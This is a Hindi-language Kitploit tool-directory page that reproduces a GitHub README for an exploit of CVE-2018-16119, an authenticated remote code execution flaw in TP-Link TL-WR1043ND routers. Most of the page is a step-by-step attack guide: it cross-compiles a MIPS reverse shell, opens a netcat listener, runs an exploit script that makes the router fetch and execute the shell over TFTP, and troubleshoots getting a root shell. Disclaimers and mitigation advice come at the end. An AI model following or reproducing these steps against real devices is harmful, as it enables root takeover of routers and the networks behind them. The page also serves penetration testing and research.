Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND - प्रमाणित रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/hdbreaker/cve-2018-16119
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगहार्डवेयर सुरक्षालर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - प्रमाणित रिमोट कोड निष्पादन

163151 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट

CVE-2018-16119: TP-Link WR1043ND में प्रमाणित रिमोट कोड निष्पादन (Authenticated Remote Code Execution)

अवलोकन

CVE-2018-16119 एक गंभीर प्रमाणित रिमोट कोड निष्पादन भेद्यता है जो TP-Link TL-WR1043ND राउटरों को प्रभावित करती है। यह भेद्यता प्रमाणित हमलावरों को लक्षित डिवाइस पर रूट विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से सिस्टम से पूर्ण समझौता हो सकता है।

CVE विवरण: CVE-2018-16119

भेद्यता का प्रभाव

  • हमला वेक्टर (Attack Vector): नेटवर्क
  • हमले की जटिलता (Attack Complexity): कम
  • आवश्यक विशेषाधिकार (Privileges Required): कम (प्रमाणीकरण आवश्यक)
  • उपयोगकर्ता सहभागिता (User Interaction): कोई नहीं
  • दायरा (Scope): परिवर्तित (Changed)
  • प्रभाव: डिवाइस की गोपनीयता, अखंडता और उपलब्धता से पूर्ण समझौता

एक बार दोहन हो जाने पर, हमलावर को राउटर तक रूट शेल पहुंच प्राप्त हो जाती है, जिससे वे निम्न कार्य कर सकते हैं:

  • राउटर कॉन्फ़िगरेशन संशोधित करना
  • नेटवर्क ट्रैफ़िक की निगरानी करना
  • पार्श्व गति (lateral movement) के लिए डिवाइस को पिवट पॉइंट के रूप में उपयोग करना
  • स्थायी बैकडोर स्थापित करना
  • नेटवर्क कनेक्टिविटी बाधित करना

प्रभावित डिवाइस

  • TP-Link TL-WR1043ND (कई फर्मवेयर संस्करण)
  • संभावित रूप से समान फर्मवेयर का उपयोग करने वाले अन्य TP-Link डिवाइस

पूर्वापेक्षाएँ

सिस्टम आवश्यकताएँ

  • रूट विशेषाधिकारों वाला Linux होस्ट (पोर्ट 69 पर TFTP सर्वर के लिए आवश्यक)
  • Docker (क्रॉस-कंपाइलेशन के लिए)
  • लक्षित डिवाइस के लिए नेटवर्क कनेक्टिविटी
  • लक्षित राउटर के लिए मान्य प्रमाणीकरण क्रेडेंशियल

निर्भरताएँ (Dependencies)

root@kitploit:~
# आवश्यक पैकेज स्थापित करें
sudo apt-get update
sudo apt-get install netcat docker.io

दोहन मार्गदर्शिका (Exploitation Guide)

चरण 1: रिवर्स शेल पेलोड संकलित करें

इस दोहन के लिए MIPS बिग-एंडियन रिवर्स शेल बाइनरी की आवश्यकता होती है। इसे संकलित करने के लिए निम्न चरणों का पालन करें:

root@kitploit:~
# सोर्स कोड को /tmp में कॉपी करें
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# MIPS क्रॉस-कंपाइलेशन टूल्स वाले Docker कंटेनर का उपयोग करें
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

Docker कंटेनर के अंदर:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

Docker से बाहर निकलें और संकलित बाइनरी को कॉपी करें:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

चरण 2: रिवर्स शेल लिसनर स्थापित करें

एक टर्मिनल खोलें और पोर्ट 9669 पर netcat लिसनर प्रारंभ करें:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

चरण 3: दोहन निष्पादित करें

रूट विशेषाधिकारों के साथ दोहन स्क्रिप्ट चलाएँ (TFTP सर्वर के लिए आवश्यक):

root@kitploit:~
sudo python3 exploit/exploit.py

स्क्रिप्ट निम्न कार्य करेगी:

  1. लक्षित राउटर पर प्रमाणित करना
  2. पोर्ट 69 पर TFTP सर्वर प्रारंभ करना
  3. रिवर्स शेल को डाउनलोड और निष्पादित करने के लिए भेद्यता का दोहन करना
  4. आपके लिसनर पर वापस कनेक्शन स्थापित करना

चरण 4: शेल के साथ इंटरैक्ट करें

एक बार कनेक्शन स्थापित हो जाने पर:

  • आपके पास राउटर तक रूट पहुंच होगी
  • प्रारंभ में कोई विस्तृत आउटपुट (verbose output) प्रदर्शित नहीं होगा
  • शेल के साथ इंटरैक्ट करने के लिए बस कमांड टाइप करना शुरू करें

प्रोजेक्ट संरचना

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # मुख्य दोहन स्क्रिप्ट
│   ├── requirements.txt        # Python निर्भरताएँ
│   ├── notes.txt              # अतिरिक्त नोट्स
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # रिवर्स शेल सोर्स कोड
│       └── shh                     # संकलित MIPS बाइनरी
├── firmware/
│   └── wr740nv4_webrevert.bin     # नमूना फर्मवेयर
├── squashfs-root/                  # निकाला गया फर्मवेयर फाइलसिस्टम
└── README.md                       # यह फ़ाइल

सुरक्षा संबंधी विचार

जिम्मेदार प्रकटीकरण (Responsible Disclosure)

इस भेद्यता को जिम्मेदारीपूर्वक प्रकट किया गया है और इसका उपयोग केवल निम्न के लिए किया जाना चाहिए:

  • अधिकृत पैठ परीक्षण (Authorized penetration testing)
  • नियंत्रित वातावरण में सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य

कानूनी नोटिस

⚠️ चेतावनी: यह दोहन केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। इस टूल का उपयोग करने से पहले उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है।

शमन अनुशंसाएँ (Mitigation Recommendations)

  • नवीनतम फर्मवेयर संस्करण में अपडेट करें
  • डिफ़ॉल्ट प्रशासनिक क्रेडेंशियल बदलें
  • यदि आवश्यक न हो तो रिमोट प्रबंधन अक्षम करें
  • नेटवर्क विभाजन (Network segmentation) लागू करें
  • संदिग्ध नेटवर्क गतिविधि की निगरानी करें

निर्भरताएँ (Dependencies)

Python आवश्यकताएँ स्थापित करें:

root@kitploit:~
pip3 install -r exploit/requirements.txt

समस्या निवारण (Troubleshooting)

सामान्य समस्याएँ

TFTP सर्वर अनुमति अस्वीकृत (Permission Denied):

  • सुनिश्चित करें कि स्क्रिप्ट रूट विशेषाधिकारों के साथ चलाई गई है
  • जाँचें कि पोर्ट 69 पहले से उपयोग में तो नहीं है

कनेक्शन विफल (Connection Failed):

  • लक्ष्य के लिए नेटवर्क कनेक्टिविटी सत्यापित करें
  • पुष्टि करें कि प्रमाणीकरण क्रेडेंशियल सही हैं
  • फ़ायरवॉल सेटिंग्स जाँचें

कोई शेल प्रतिक्रिया नहीं (No Shell Response):

  • शेल को प्रारंभ होने में कुछ समय लग सकता है
  • Enter दबाने या id या pwd जैसे बुनियादी कमांड टाइप करने का प्रयास करें

अनुसंधान और विकास

यह अनुसंधान एम्बेडेड डिवाइस फर्मवेयर में गंभीर सुरक्षा कमजोरियों को प्रदर्शित करता है। यह भेद्यता निम्न के महत्व को उजागर करती है:

  • एम्बेडेड सिस्टम में सुरक्षित कोडिंग प्रथाएँ
  • IoT डिवाइसों के नियमित सुरक्षा ऑडिट
  • समय पर फर्मवेयर अपडेट और पैच प्रबंधन

संदर्भ

  • CVE-2018-16119 आधिकारिक प्रविष्टि
  • TP-Link सुरक्षा सलाहकार (Security Advisories)

संपर्क और श्रेय

अनुसंधानकर्ता: Alejandro Parodi
ट्विटर: @hdbreaker
लिंक्डइन: Alejandro Parodi


यह अनुसंधान शैक्षिक उद्देश्यों और एम्बेडेड सिस्टम की सुरक्षा में सुधार के लिए आयोजित किया गया था। कृपया जिम्मेदारीपूर्वक उपयोग करें।

टूल डाउनलोड करें